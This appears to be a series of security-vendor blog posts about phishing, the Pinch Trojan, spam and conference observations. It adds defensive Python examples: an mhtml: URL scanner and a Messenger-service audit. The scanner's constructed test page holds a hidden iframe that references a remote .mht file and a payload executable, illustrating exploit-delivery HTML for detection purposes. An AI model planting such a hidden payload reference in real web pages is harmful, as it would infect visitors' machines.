Yesterday we published our annual report, which includes my favourite topic - how the threat landscape’s going to change in 2009. One of the things we expect to see is an increase in the number of phishing attacks and scams on the Internet:
"Secondly, the technical sophistication needed to develop and spread new malicious programs will force many cyber criminals to search for simpler and cheaper ways of making a profit. Phishing may be one of the more attractive solutions."
And, whether by coincidence or design, yesterday I got an email which is just what I’m talking about above – a scam that’s easy and cheap to implement.
Subject: please see the attachment
Sender (fake): Internal Revenue Service [email@example.com]
Message: Please see the attachment make sure you fill all the columns and send fax to: +1-646-308-1145.
This type of phishing has been around for a while, but it’s the first time I’ve received a message like this - maybe I’ve just been lucky, because I know my address is all over spammer databases :)
This is so-called offline phishing; the bad guys don’t even go to the trouble of making a fake site, but just ask you to fax through all your details. Using a fax number gives an additional aura of credibility to the whole thing – most people have heard of phishing sites, but a lot of them won’t have heard of phishing by fax. And the combination of a government department and a fax number fits perfectly with the perception that public institutions are more than a bit behind the times.
Back in December 2007 we blogged about how the Russian Federal Security Service identified and arrested the authors of Pinch.
Yesterday a whole bunch of media in different countries referenced PrevX, who were saying that the Pinch Trojan is still very active, infecting thousands of users around the world every day.
One particularly interesting article came from The Register, a UK publication, which says:
"The two suspected authors of the virus creation toolkit were arrested and questioned by Russian police in December 2007 but never prosecuted."
These words have been reproduced in some form or another by other publications, particularly Russian ones. And of course, such statements beg the question “why haven’t the authors of Pinch been sentenced?”
As we’ve always been on the front line in the fight against Pinch, and we tracked the history of Pinch very carefully indeed, of course we’re able to answer this question.
The people who created and spread Pinch were identified, and the surnames given in the media – Ermishkin and Farkhutdinov – belong to these people. A criminal case was raised, with the investigation being carried out throughout 2008. The fact that the investigation took so long reflects the complexity of the Pinch story.
Greetings from London – or more specifically from RSA Europe 2008. Denis, Andrei, Roel and I are all here at this year's conference which is dedicated to Alan Turing, the great British mathematician and cryptographer.
If you keep your ears open, the names you'll hear most frequently are Turing, Enigma, and Bruce Schneier. The conference includes a display of cipher machines from a range of eras and countries, including the Enigma machine whose code Turing helped to break. Needless to say, there's no shortage of people wanting to take a look!
We always expect a rise in cyber crime in the holiday season. This year, for instance, we have seen a noticeable rise in spam, along with a rise in phishing.
I have even received a phishing email in my Gmail mailbox – the first one in ages. The phish was nothing special; the usual notification about a new payment system for an online bank with a link to the spoofed website.
What caught my eye was how Google handled the phish. The Gmail interface added a number of relevant paid advertising links to the email. Take a look at the upper left and lower right corners:
I think that adding such links increases user trust in fraudulent emails. Users see that Google has included keyword-related links, so they are liable to trust the email – and fall victim to the phishing scam.
What do you think? In any case, holidays are unfortunately a busy time for criminals in all spheres, including the Internet. Take care of yourself and safe surfing!
Hello from Tianjin in China, and the AVAR 2005 conference. We're 150km from Peking, near the Bohai sea. This year's conference is the eighth annual event for virus analysts from the Asian region, and it's one of the highlights of an antivirus researcher's calendar, together with VB, CARO and EICAR.
This year attendance is good, with leading virus analysts along with IT industry people and government officials. For instance, speakers include Dmitry Gryaznov and Igor Muttik from McAfee, Vesselin Bontchev from Frisk and Eugene from...well, we know where he's from.
There are also speakers from the Chinese Ministry of the Interior, which has done a lot in the past few years to combat cyber crime.
Eugene's presentation was greeted enthusiastically and there were lots of questions. While he was speaking, I started doing a bit of research. I wanted to check out the wireless Internet connections, as well as mobile devices.
I found 3 WiFi networks straight away. None of them encrypted traffic, but all of them had built-in DHCP servers. In short, all 3 were potentially vulnerable to war drivers. By the way, tomorrow I'm going to scan other WiFi networks in Tianjin and Peking.
Next I took a Bluetooth transmitter with a 100 meter radius and walked around the conference hall scanning for Bluetooth devices in 'visible to all' mode. I found plenty:
Overall, I found 9 mobile devices with Bluetooth 'visible to all' mode enabled, 8 of them Nokia smartphones. Yes, I know. You'd think that people attending an antivirus conference would know better. In fact, I had been hoping that I wouldn't find any at all.
The good news is that none of the phones were infected with Cabir. At least, not yet...
Today I ran across an interesting piece of spam. The ending contained an offer to unsubscribe by clicking "here". Naturally, I clicked and landed on a web page (HTML) that supposedly checked my name against a database. The page then showed me the following message: "your address has been removed from the mailing list".
Sounds reasonable, doesn't it? But ... the end of the HTML file contains Exploit.HTML.Mht which uses the MHTML URL Processing Vulnerability to download malware: in my case it was Trojan-Dropper.Win32.Small.gr and Trojan-Spy.Win32.Banker.s.
Good reminder - never, ever unsubscribe from spam. At best you let the spammer know your address is live, and at worst you end up with an infected computer.
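The trap described above hinged on a page that looked harmless but carried a reference to the mhtml: URL scheme at the bottom. As an added example (not code from the original post), the scanner below walks an HTML document and flags every attribute value, inline style or style block that points at an mhtml: URL. The sample HTML is constructed for the demo, and the assumption that exploit URLs of this family use the form mhtml:<outer URL>!<inner path> is made here, not stated by the post; the scanner reports whether that "!" layout is present but flags any mhtml: reference regardless.

```python
"""Flag HTML that references the mhtml: URL scheme.

Added example, not part of the original post. The "!" container/inner
split is an assumption about the MHTML URL Processing Vulnerability
exploit family; the sample page below is constructed.
"""
import re
from html.parser import HTMLParser

# Any attribute value starting with the mhtml: scheme, case-insensitive.
MHTML_RE = re.compile(r"^\s*mhtml:", re.IGNORECASE)
# url(...) references inside CSS, with or without quotes.
CSS_URL_RE = re.compile(r"url\(\s*['\"]?([^'\")]+)", re.IGNORECASE)


class MhtmlScanner(HTMLParser):
    """Collects every mhtml: reference found in tags, style attributes and <style> blocks."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if not value:
                continue
            if MHTML_RE.match(value):
                self._record(tag, name, value)
            elif name == "style":
                for url in CSS_URL_RE.findall(value):
                    if MHTML_RE.match(url):
                        self._record(tag, "style:url()", url)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        # HTMLParser hands us the raw contents of <style> blocks here.
        if self._in_style:
            for url in CSS_URL_RE.findall(data):
                if MHTML_RE.match(url):
                    self._record("style", "url()", url)

    def _record(self, tag, where, url):
        self.findings.append({
            "tag": tag,
            "where": where,
            "url": url.strip(),
            # assumed exploit layout: mhtml:<container URL>!<path inside it>
            "container_and_inner": "!" in url,
        })


def scan_html(html):
    """Return a list of mhtml: references found in the document (empty if none)."""
    parser = MhtmlScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def has_mhtml_reference(html):
    return bool(scan_html(html))


# Constructed sample: the reassuring "removed" page with a hidden frame at the end.
SAMPLE_PAGE = """<html><body>
<p>Your address has been removed from the mailing list.</p>
<a href="http://example.invalid/unsubscribe">here</a>
<iframe src="MHTML:http://example.invalid/unsub.mht!file://payload.exe" width=0 height=0></iframe>
</body></html>"""

CLEAN_PAGE = """<html><body><p>Thanks for reading.</p>
<img src="http://example.invalid/logo.png"></body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_PAGE):
        print(f"{f['tag']} {f['where']}: {f['url']} (container!inner: {f['container_and_inner']})")
```

Run it over a saved copy of a suspicious page before opening it in a browser; any hit is reason enough to discard the page, and the mail filter rule that follows is simply "quarantine HTML that matches".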
We are seeing an increase in spam sent via the MS Windows Messenger service. Spammers are abusing a feature in the service to trigger fake error or warning messages from the messenger service.
Very often, the message warns users that a significant number of spyware programs have been detected on their machine and recommends that users download an anti-spyware program.
Naturally, this is an attempt to trick users into downloading Trojans, in the worst case scenario, or in the best case scenario, useless utilities that imitate spyware detection. In any case, adware and spyware are neither detected nor removed.
What we are seeing is virus writers adapting the never-ending social engineering technique of picking up on a well-publicized security issue. This time the media attention and public awareness of the term spyware is being exploited.
We urge users to be aware that such messages are fake and to avoid downloading any programs advertised in this manner. This kind of spam can be prevented on PCs where you have admin rights by disabling the Messenger service (C:\WINDOWS\System32\svchost.exe -k netsvcs) or Control Panel
Read more about MS Windows Messenger Service:
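The mitigation above is to stop the Messenger service and keep it from starting again. As an added example (not code from the original post), the script below audits that state from the text that the sc.exe tool prints for `sc query Messenger` and `sc qc Messenger`, and lists the two sc commands that carry out the remediation. The output layout is assumed from the Windows XP-era sc.exe, and both sample outputs are constructed for the demo.

```python
"""Audit whether the Windows Messenger service can still deliver pop-ups.

Added example, not part of the original post. Parses constructed sc.exe
output (layout assumed from the XP-era tool) and returns the remediation
commands when the service is running or set to start.
"""
import re
import subprocess
import sys

# Constructed `sc query Messenger` output from an unhardened machine.
SAMPLE_QUERY = r"""SERVICE_NAME: Messenger
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
"""

# Constructed `sc qc Messenger` output from the same machine.
SAMPLE_QC = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Messenger
        TYPE               : 20  WIN32_SHARE_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\WINDOWS\System32\svchost.exe -k netsvcs
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Messenger
        DEPENDENCIES       : LanmanWorkstation
        SERVICE_START_NAME : LocalSystem
"""

# Constructed output after remediation: stopped and disabled.
HARDENED_QUERY = SAMPLE_QUERY.replace("4  RUNNING", "1  STOPPED")
HARDENED_QC = SAMPLE_QC.replace("2   AUTO_START", "4   DISABLED")

# sc.exe prints "FIELD : <number>  <SYMBOLIC_NAME>"; we want the symbolic name.
FIELD_RE = re.compile(r"^\s*(STATE|START_TYPE)\s*:\s*\d+\s+(\S+)", re.MULTILINE)

# Stop the service now, then keep it from starting at boot (the space after
# "start=" is required by sc.exe's argument syntax).
REMEDIATION = ["sc stop Messenger", "sc config Messenger start= disabled"]


def parse_sc(text):
    """Map the STATE / START_TYPE fields of sc.exe output to their symbolic values."""
    return dict(FIELD_RE.findall(text))


def assess(query_text, qc_text):
    """Decide whether the Messenger service is still exposed and what to run."""
    state = parse_sc(query_text).get("STATE", "UNKNOWN")
    start = parse_sc(qc_text).get("START_TYPE", "UNKNOWN")
    exposed = state == "RUNNING" or start in ("AUTO_START", "DEMAND_START")
    return {
        "state": state,
        "start_type": start,
        "exposed": exposed,
        "remediation": REMEDIATION if exposed else [],
    }


def live_assessment():
    """Run the real sc.exe queries; only meaningful on Windows."""
    query = subprocess.run(["sc", "query", "Messenger"], capture_output=True, text=True).stdout
    qc = subprocess.run(["sc", "qc", "Messenger"], capture_output=True, text=True).stdout
    return assess(query, qc)


if __name__ == "__main__":
    result = live_assessment() if sys.platform == "win32" else assess(SAMPLE_QUERY, SAMPLE_QC)
    print(result)
```

An administrator without command-line access reaches the same result through Control Panel by setting the Messenger service's startup type to Disabled and stopping it.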
Kevin Mitnick, the infamous ex-hacker, visited Moscow yesterday where he spoke about social engineering at an information security forum. It would be difficult to imagine a more appropriate speaker, since Kevin was the first to introduce the term social engineering to computer security. In fact he was the first cyber criminal to use social engineering techniques for profit. Today, Kevin is using his expertise to protect users from other 'social engineers'.
The presentation itself was fascinating, but the real reason I wanted to tell you about it is:
Valentine's Day. A day to tell the people you love exactly how much you love them. However, it is also a day that virus writers love, too. For the past few years we have witnessed mass mailings of Trojans and worms masquerading as valentines: a perfect example of social engineering. Most people are eager and willing to believe that a 'secret admirer' has sent them a card and open the attachment or click on the link.
Just think about it. Think about how long social engineering techniques have been used to dupe gullible people – again and again. Make a resolution: to treat electronic valentines with due suspicion this year. Finally.
Police in Italy have arrested almost 40 people so far in conjunction with credit card fraud. So far, there is evidence that the gang has pocketed around 600,000 euros, but police are still investigating.
The criminals developed software that harvested credit card numbers via the Internet from users with Visa, Amex and other major credit cards.
Another blow against cyber crime, and another reminder to users that extreme caution is needed when using credit cards online.
Over the past week we saw more and more phishing emails every day. A major European ISP told us that within 24 hours they scanned 16 million messages and 268,000 were phishing scams. And this wasn't one scam - there were many different messages targeting companies including Citibank, US Bank, eBay, PayPal and SunTrust.
On the other hand, the computer underground may be taking revenge for the successful arrests of fellow cyber criminals over the past several months around the globe.
We are monitoring the situation, but do caution users to be extra careful about answering emails from financial institutions.